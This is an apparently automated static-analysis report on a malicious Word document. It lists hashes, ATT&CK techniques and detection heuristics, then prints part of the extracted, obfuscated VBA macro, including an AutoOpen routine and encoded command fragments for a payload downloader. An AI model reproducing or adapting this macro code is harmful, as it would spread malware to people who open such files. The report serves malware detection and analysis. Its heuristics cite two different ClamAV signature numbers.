Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0c8fa46588c5a57a…

MALICIOUS

Office (OLE)

Size: 170.0 KB
Created: 2018-05-17 11:18:00
Authoring application: Microsoft Office Word
First seen: 2018-11-13
MD5: 83bae9d929a9afefc5ab13b096fe5a8b
SHA-1: 14e84085285f878e307000ddc4a8adefec02efe9
SHA-256: 0c8fa46588c5a57a05d4f24c73ff419fd56c1d136ffa2e78c38bebc9addd4bdc
Risk Score: 202

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Doc.Dropper.Agent-6547033-0. Static analysis revealed a VBA macro with an AutoOpen subroutine, which runs automatically when the document is opened. A critical heuristic fired on a Shell() call inside this macro, indicating that it likely attempts to download and execute a secondary payload. The presence of legacy WordBasic auto-execution markers further supports this assessment.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-6547082-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6547082-0
  • VBA macros detected [medium, 2 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                                   Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)      160140 bytes
SHA-256: fd6ea60fc9cb621aa12183d8fc621c6e2e717326012b2100261aaecfc39876bc

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "pYMjBLNMFjVbC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub sfzsG(cjkmW)
cSnqSu = OwEPm
zCzUc = (idFaUM / owVDMJ / 7936 / Fix(dOjPH)) + 63362 - CLng(iGoQK + CLng(53935)) + NcLIL + 85257 * XsSdl - CStr(11758) / tvrGi / CLng(WoQFU)
End Sub
Sub buwmEB(hjssE)
LtFVQm = anpLw
cQkYM = (oRRRY / ObhYf / 911 / Fix(nJWRQ)) + 35635 - CLng(SwTnEn + CLng(80342)) + ZnzKjl + 30708 * uchPCK - CStr(78170) / IpIJA / CLng(zTGMn)
wiMlQS = ubUUR
dcojC = (IJRiPi / uSndET / 96366 / Fix(hQPvz)) + 67964 - CLng(uanUq + CLng(73144)) + iKjDP + 59816 * hzzGjX - CStr(68261) / zQBTz / CLng(LZoCOA)
qruou = oduBE
tzQRo = (LYocX / XoaSl / 89792 / Fix(AiRqH)) + 6249 - CLng(pzudD + CLng(28716)) + AEzvHA + 74799 * baOUa - CStr(32486) / zWszA / CLng(obIIO)
End Sub
Sub aLdLZ(WWkdX)
uNzCrc = cBjCYl
OuMco = (tiMrzO / LEuVTz / 28217 / Fix(mFljf)) + 40556 - CLng(TrJFaV + CLng(88266)) + KHokkP + 3050 * FcnbX - CStr(14966) / iYWzb / CLng(asIRHL)
isoTR = jOfOip
wjHstO = (dajEX / njOfT / 55507 / Fix(jYMnU)) + 18932 - CLng(YzDKrI + CLng(81963)) + ulQXtz + 83917 * Lkvzo - CStr(441) / zuBlEa / CLng(TXjSn)
End Sub
Sub Autoopen()
On Error Resume Next
XWMPbz = cPvjEo
BDZKH = (zEPqW / PbStoa / 22758 / Fix(kpYfY)) + 83323 - CLng(XkzRj + CLng(29874)) + SQwZL + 30580 * TGWsph - CStr(26759) / VHJtb / CLng(LftlPM)
UVJzvTMzF (UQYqWF + XWiFPmiJNYdcjM + BvPPv)
RiCmiJ = MOsIno
GlEnvD = (wqwCS / FIartz / 83130 / Fix(cdGCG)) + 29035 - CLng(FYPCi + CLng(55121)) + QqbTs + 65876 * sDkQh - CStr(84642) / nAPqz / CLng(dIwkp)
End Sub
Sub ltRjzk(DskQZE)
wkZVm = XMRXz
kOYIr = (iEwZaU / fioLDk / 79894 / Fix(oRticw)) + 32876 - CLng(Ybujm + CLng(99726)) + fjtZvA + 23479 * JEkHp - CStr(66606) / OnKaw / CLng(iZOsNm)
zjlwf = IbKKtl
tkirqb = (XMGZMD / AJihiN / 77505 / Fix(cTmcrZ)) + 48787 - CLng(dQpUD + CLng(89365)) + XClEAk + 50615 * lcKHS - CStr(61550) / LYnTHL / CLng(OjIwI)
JWijGN = iwInp
HBzhR = (YAERj / nkSnCv / 4133 / Fix(zCPtbB)) + 8717 - CLng(wPPzi + CLng(9033)) + DOCrr + 69774 * EFBwTd - CStr(77406) / tNlNFE / CLng(GFQCzC)
End Sub
Sub CjGijP(AEKrV)
Jrcibk = VBNRz
RIwaol = (PCUskw / RtJaV / 69109 / Fix(bOcib)) + 27567 - CLng(TATpij + CLng(94548)) + DdVGu + 67627 * WkziL - CStr(78904) / snvPtq / CLng(TsNWfv)
End Sub

Attribute VB_Name = "BCBQcAp"
Sub EOpWUs(kzCGrI)
tTmHXk = IkPnFU
vNjomM = (haXVBb / QUZDt / 42179 / Fix(idUcE)) + 89389 - CLng(iZiPXL + CLng(79208)) + TREvzL + 85670 * lWJds - CStr(30844) / kLwYMk / CLng(LhSlD)
End Sub
Function XWiFPmiJNYdcjM()
On Error Resume Next
oGdPS = AHwzYz
NjFvRE = (jwDYn / wEGWdM / 16637 / Fix(bfttKL)) + 29183 - CLng(lOaaWX + CLng(60309)) + mBhpR + 80088 * Fcqiw - CStr(1469) / ULowlD / CLng(BGtzz)
KqDow = FppOCF
GzUzU = (mIuDmz / jIuipH / 93629 / Fix(qQFZi)) + 73645 - CLng(dafpI + CLng(31522)) + hfsmw + 31598 * QnRpK - CStr(33531) / uGYvJi / CLng(iOapM)
EOVVIY = kJipQ("0.Rts[,'8OA'(Ecalper.)'$','rNG'(Ecalper.)'`','Fah'(Ecalper.)'))93]raHC[]gnIrTS[,)811bv,l99Z", 86832 + 8 - 86832, 86832 + 82 - 86832)
iTYwqV = aPqCK
KadokU = (OjUGu / hIzQRz / 68207 / Fix(cwOVzp)) + 18659 - CLng(fPVkc + CLng(46095)) + EaqVsM + 89780 * RBqnzb - CStr(96570) / Fbqhd / CLng(TkiLr)
PZumZX = iXHdPj
SiLri = (YaYat / HHfAY / 74725 / Fix(WjwSi)) + 51600 - CLng(cdhct + CLng(41053)) + hZTFjH + 28093 * oATtA - CStr(30144) / wXiqMJ / CLng(UPcQUh)
UEciOJrW = kJipQ("r7F]raHC[+27]raHC[+38]raHC[((ECALper.)43]raHC[]gnIrTS[,)76]raHC[+1'+'11]'+'raHC[+78]raHC[((ECALper.)8OAFah8OA,)301]raHC[+901]raHC[+021]raHC[((EC'+'ALper.)29]raHC[]gnIrTS[,8OAzEAVNF", 8616 + 6 - 8616, 8616 + 172 - 8616)
twhXva = MvpfoQ
zzpawt = (KuDJUn / DcSmh / 19106 / Fix(EmVEpB)) + 74067 - CLng(sKXtBX + CLng(31599)) + qWnRiB + 57964 * bmdIS - CStr(44371) / HGwsMT / CLng(IsriB)
cHhap = XWpzH
GZMbTK = (LUrmH / YNwWmh / 64666 / Fix(EsFrF)) + 71890 - CLng(QKOjN + CLng(63204)) + ZGljLX + 34448 * kVZoQp - CStr(53075) / CSaMCh / CLng(jNZpu)
BULsQmdb =
... (truncated)